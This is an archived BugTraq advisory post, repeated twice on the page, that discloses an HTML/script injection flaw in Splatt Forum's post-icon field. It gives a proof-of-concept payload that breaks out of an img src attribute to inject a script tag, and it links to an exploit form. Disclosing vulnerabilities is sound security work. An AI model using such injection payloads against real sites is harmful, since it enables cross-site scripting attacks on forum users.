BugTraq
Back to list
|
Post reply
Splatt Forum html injection code in post icon
Jul 15 2003 03:53PM
Lethalman (lethalman libero it)
Any user can inject html code when create a new post.
The bug are in the post icon:
<img src="icon.gif" etc.>
If you create a personalized form with this code:
icon.gif"><script>alert('bug');<script><any
tag="
the final code of the post icon is:
<img
src="icon.gif"><script>alert('bug');<script><any
tag="" etc.>
The exploit form is here:
http://members.fortunecity.it/lethalman2002/bugs/splatt.html
by Lethal Lab (Lethalman)
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Any user can inject html code when create a new post.
The bug are in the post icon:
<img src="icon.gif" etc.>
If you create a personalized form with this code:
icon.gif"><script>alert('bug');<script><any
tag="
the final code of the post icon is:
<img
src="icon.gif"><script>alert('bug');<script><any
tag="" etc.>
The exploit form is here:
http://members.fortunecity.it/lethalman2002/bugs/splatt.html
by Lethal Lab (Lethalman)
[ reply ]